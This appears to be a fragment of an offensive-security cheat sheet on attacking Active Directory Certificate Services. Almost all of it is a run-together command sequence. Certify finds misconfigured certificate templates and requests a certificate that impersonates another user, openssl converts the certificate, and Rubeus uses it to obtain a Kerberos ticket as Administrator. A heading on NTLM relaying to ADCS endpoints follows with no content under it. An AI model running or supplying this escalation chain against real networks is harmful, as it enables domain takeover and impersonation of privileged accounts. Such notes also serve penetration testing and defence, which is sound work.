Certificates
Introduction
Misconfigured Certificate Templates
.\Certify.exe find /vulnerable.\Certify.exe request /ca:<PREVIOUSLY_OBTAINED_CA> /template:<VULNERABLE_TEMPLATE_NAME> /altname:<USER_TO_IMPERSONATE>openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxcat cert.pfx | base64 -w 0.\Rubeus.exe asktgt /user:Administrator /nowrap /password:<EXPORTING_PASSWORD> /certificate:<BASE64>NTLM Relaying to ADCS HTTP Endpoints
Last updated